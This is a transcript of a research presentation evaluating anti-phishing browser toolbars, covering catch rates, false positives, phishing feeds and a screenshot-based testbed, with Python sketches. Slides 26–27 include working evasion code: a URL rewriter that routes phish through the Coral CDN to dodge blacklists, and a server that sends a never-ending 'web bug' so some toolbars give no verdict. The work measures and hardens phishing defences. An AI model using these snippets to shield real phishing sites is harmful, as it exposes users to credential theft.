
Phinding Phish: An Evaluation of Anti-Phishing Toolbars

This study evaluates the effectiveness and usability of various anti-phishing toolbars available on the market. It examines their catch rates, false positives, and performance with different phishing feeds. The study also explores the impact of content delivery network (CDN) and page load attacks on these toolbars, suggesting areas for improvement.


Presentation Transcript


  1. Phinding Phish: An Evaluation of Anti-Phishing Toolbars Yue Zhang, Serge Egelman, Lorrie Cranor, and Jason Hong

  2. Anti-Phishing Tools • 84 listed on download.com (Sept. ‘06) • Included in many browsers • Poor usability: • Many users don’t see the indicators • Many choose to ignore them • But usability is being addressed • Are the tools accurate?

  3. Tools Tested • CallingID • Cloudmark • EarthLink

  4. Tools Tested • eBay • Firefox

  5. Tools Tested • IE7

  6. Tools Tested • Netcraft • Netscape

  7. Tools Tested • SpoofGuard • TrustWatch

  8. Source of Phish • Need a high volume of fresh phish • Sites are taken down after a day on average • Fresh phish yield blacklist-update information • Can’t use the toolbars’ own blacklists as a source • We experimented with several sources: • APWG: high volume, but many duplicates and legitimate URLs included • PhishTank.org: lower volume, but easier to extract phish • Assorted other phish archives: often low volume or not fresh enough

  9. Phishing Feeds • Anti-Phishing Working Group • reportphishing@antiphishing.org • Reports from ISPs, individuals, etc. • >2,000 messages/day • URLs extracted from the message bodies (see the sketch below) • PhishTank • http://www.phishtank.org/ • Submitted by the public • ~48 messages/day • URLs manually verified
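
Both feeds deliver phish embedded in e-mail reports, so candidate URLs must first be pulled out of the message bodies. A minimal Python sketch of that extraction step; the regex and deduplication here are illustrative assumptions, not the authors' actual filter:

```python
import re

# Naive URL pattern; the paper does not specify the authors' actual filter.
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

def extract_urls(message_body: str) -> list[str]:
    """Pull candidate phishing URLs out of a reported e-mail body."""
    seen, unique = set(), []
    for url in URL_RE.findall(message_body):
        # Feeds contain many duplicates, so deduplicate while keeping order.
        if url not in seen:
            seen.add(url)
            unique.append(url)
    return unique

print(extract_urls("Fake bank at http://evil.example/login also http://evil.example/login"))
# -> ['http://evil.example/login']
```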

  10. Testbed for Anti-Phishing Toolbars • Automated testing • Aggregate performance statistics • Key design issue: • Different browsers • Different toolbars • Different indicator types • Solution: Image analysis • Compare screenshots with known states

  11. Image-Based Comparisons • Two examples: TrustWatch and Google • TrustWatch screenshots matched against known states: Not verified / Verified • Google screenshots matched against known states: Warning!! / Phish!! (see the sketch below)
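
Since every toolbar renders its verdict differently, the testbed decides which state a toolbar is in by comparing a screenshot of its indicator region against reference images of each known state. A minimal sketch of that comparison using Pillow; the crop box, reference paths, and nearest-match rule are assumptions for illustration, not the paper's exact algorithm:

```python
from PIL import Image, ImageChops

# Reference screenshots of each known toolbar state (hypothetical paths).
REFERENCES = {
    "phish": "refs/warning.png",
    "legitimate": "refs/verified.png",
    "neutral": "refs/not_verified.png",
}

def classify_state(screenshot_path: str, box=(0, 0, 200, 30)) -> str:
    """Crop the toolbar's indicator region and match it to the closest reference."""
    region = Image.open(screenshot_path).convert("RGB").crop(box)
    best_state, best_diff = None, float("inf")
    for state, ref_path in REFERENCES.items():
        ref = Image.open(ref_path).convert("RGB").crop(box)
        # Total absolute per-channel pixel difference; lower means a closer match.
        diff = sum(sum(px) for px in ImageChops.difference(region, ref).getdata())
        if diff < best_diff:
            best_state, best_diff = state, diff
    return best_state
```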

  12. Testbed System Architecture

  13. Testbed System Architecture Retrieve Potential Phishing Sites

  14. Testbed System Architecture Send URL to Workers

  15. Testbed System Architecture Worker Evaluates Potential Phishing Site

  16. Testbed System Architecture Task Manager Aggregates Results
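
Slides 12-16 outline the pipeline: the Task Manager retrieves candidate phishing sites, sends each URL to the Workers, each Worker evaluates the site against its toolbar, and the Task Manager aggregates the results. A toy single-machine sketch of that flow, with a stub standing in for the real browser-and-screenshot evaluation:

```python
import queue
import threading

def worker(tasks: queue.Queue, results: list, evaluate) -> None:
    """Worker: take a URL, evaluate the toolbar's verdict on it, report back."""
    while True:
        url = tasks.get()
        if url is None:  # sentinel: no more work for this worker
            break
        results.append((url, evaluate(url)))

def run_testbed(urls, evaluate, n_workers: int = 2):
    """Task Manager: fan URLs out to workers and aggregate their results."""
    tasks, results = queue.Queue(), []
    threads = [threading.Thread(target=worker, args=(tasks, results, evaluate))
               for _ in range(n_workers)]
    for t in threads:
        t.start()
    for url in urls:
        tasks.put(url)
    for _ in threads:
        tasks.put(None)  # one sentinel per worker
    for t in threads:
        t.join()
    return results

# Stub evaluator standing in for "load page, screenshot toolbar, classify image".
print(run_testbed(["http://phish.example/a", "http://phish.example/b"],
                  evaluate=lambda url: "phish"))
```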

  17. Experiment Methodology • Catch Rate: Given a set of phishing URLs, what percentage are correctly labeled as phish by the tool? • False Positive Rate: Given a set of legitimate URLs, what percentage are incorrectly labeled as phish by the tool? • For both metrics, only block and warning indications count, and taken-down sites are removed (see the sketch below)
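
Once each URL has a verdict, both metrics are simple ratios. A sketch of the bookkeeping, assuming verdicts are strings and taken-down sites have already been filtered out of the phishing set:

```python
def catch_rate(phish_verdicts):
    """Share of still-live phishing URLs labeled 'block' or 'warning'."""
    caught = sum(1 for v in phish_verdicts if v in ("block", "warning"))
    return caught / len(phish_verdicts)

def false_positive_rate(legit_verdicts):
    """Share of legitimate URLs wrongly labeled 'block' or 'warning'."""
    flagged = sum(1 for v in legit_verdicts if v in ("block", "warning"))
    return flagged / len(legit_verdicts)

# e.g., 7 of 10 live phishing URLs blocked or warned about -> 70% catch rate
print(catch_rate(["block"] * 5 + ["warning"] * 2 + ["no_indicator"] * 3))  # 0.7
```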

  18. Experiment 1 • PhishTank feed used • Equipment: • 1 notebook as Task Manager • 2 notebooks as Workers • 10 tools examined: • Cloudmark • EarthLink • eBay • IE7 • Google/Firefox • McAfee • Netcraft • Netscape • SpoofGuard • TrustWatch

  19. Experiment 1 • 100 phishing URLs • PhishTank feed • Manually verified • Re-examined after 1, 2, 12, and 24 hours • Examined blacklist update rate (except with SpoofGuard, which uses heuristics rather than a blacklist) • Examined take-down rate • 514 legitimate URLs • 416 from the 3Sharp report • 35 from bank log-in pages • 35 from Alexa’s top pages • 30 random pages

  20. Experiment 2 • APWG phishing feed • 9 of the same toolbars tested + CallingID • Same testing environment

  21. Results of Experiment 1

  22. Results of Experiment 2

  23. False Positives • Not a big problem for most of the toolbars

  24. Overall Findings • No toolbar caught 100% of phish • Good performers: • SpoofGuard (>90%) • Though with a 42% false-positive rate • IE7 (70%-80%) • Netcraft (60%-80%) • Firefox (50%-80%) • Most of the rest performed poorly: • Netscape (10%-30%) • CallingID (20%-40%)

  25. More Findings • Performance varied with the feed • Better with PhishTank: • Cloudmark, EarthLink, Firefox, Netcraft • Better with APWG: • eBay, IE7, Netscape • Nearly the same on both: • SpoofGuard, TrustWatch • Catch rates increased over time by different amounts • Larger increases on the APWG feed • Reflects the “freshness” of its URLs

  26. CDN Attack • Many tools use blacklists • Many examine IP addresses (location, etc.) • Proxies distort the URL and the apparent host • Used the Coral CDN • Append .nyud.net:8090 to the URL’s hostname (see the sketch below) • Coral runs on PlanetLab • Attack succeeds against: • Cloudmark • Google • TrustWatch • Netcraft • Netscape
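
The rewrite itself is mechanical: appending .nyud.net:8090 to the hostname routes the request through Coral's proxies, so blacklist lookups and IP-based heuristics see Coral rather than the phishing host. A sketch of the transformation (the example URL is a placeholder):

```python
from urllib.parse import urlsplit, urlunsplit

def coralize(url: str) -> str:
    """Rewrite a URL so it is fetched through the Coral CDN's proxies."""
    parts = urlsplit(url)
    # Coral proxies any host whose name is suffixed with .nyud.net:8090.
    return urlunsplit(parts._replace(netloc=parts.hostname + ".nyud.net:8090"))

print(coralize("http://phish.example/login.html"))
# -> http://phish.example.nyud.net:8090/login.html
```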

  27. Page Load Attack • Some tools wait for the page to be fully loaded before rendering a verdict: • SpoofGuard • eBay • Insert a web bug that never finishes loading (see the sketch below) • 5 lines of PHP • 1x1 GIF • Infinite loop spitting out data very slowly • Tool stays in its previous state • Unable to indicate anything
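
The authors' web bug was about five lines of PHP; an equivalent Python sketch of the idea is below, with a hypothetical host and port. It claims to serve a 1x1 GIF but trickles bytes forever, so the page never finishes loading and the toolbar never leaves its previous state:

```python
import time
from http.server import BaseHTTPRequestHandler, HTTPServer

class SlowWebBug(BaseHTTPRequestHandler):
    """Claim to serve a 1x1 GIF, but never finish sending it."""
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        while True:  # trickle bytes forever, so the page never finishes loading
            self.wfile.write(b"\x00")
            self.wfile.flush()
            time.sleep(10)

# Embed <img src="http://attacker.example:8000/bug.gif"> in the phishing page.
HTTPServer(("", 8000), SlowWebBug).serve_forever()
```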

  28. Conclusion • Tool performance: • No toolbar is perfect • No single toolbar outperforms all the others • Heuristics have false positives • Whitelists? • Hybrid approach? • Testing methodology: • Get fresher URLs • Test settings other than the defaults • User interfaces: • Usability is important • Traffic light? • Pop-up message? • Redirect page?

  29. CMU Usable Privacy and Security Laboratory • http://cups.cs.cmu.edu/
